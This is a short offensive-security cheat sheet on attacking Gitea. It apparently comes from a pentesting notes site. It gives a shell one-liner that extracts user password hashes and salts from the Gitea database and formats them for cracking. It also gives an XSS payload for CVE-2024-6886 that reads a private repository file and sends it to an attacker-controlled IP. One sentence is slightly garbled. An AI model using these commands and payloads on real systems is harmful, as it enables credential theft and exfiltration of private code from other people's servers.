Gitea
Free forge based on git written in Go
Enumeration
Gitea in a docker
Look at
docker-compose.ymlto know where the db is located.The configuration file will be saved at
/data/gitea/conf/app.iniafter the installation.
Crack user hashes
Extracts and formats password hashes and salts from a Two long rows database
sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashesCVE-2024-6886 - Version: 1.22.0
Example Payload
<a href="javascript:var req = new XMLHttpRequest();req.open('GET',
'http://localhost:3000/administrator/Employee-
management/raw/branch/main/index.php', false);req.send();var response =
req.responseText;var req2 = new XMLHttpRequest();req2.open('GET',
'http://10.10.14.91:8000/?content=' + btoa(response),
true);req2.send();">Click</a>Last updated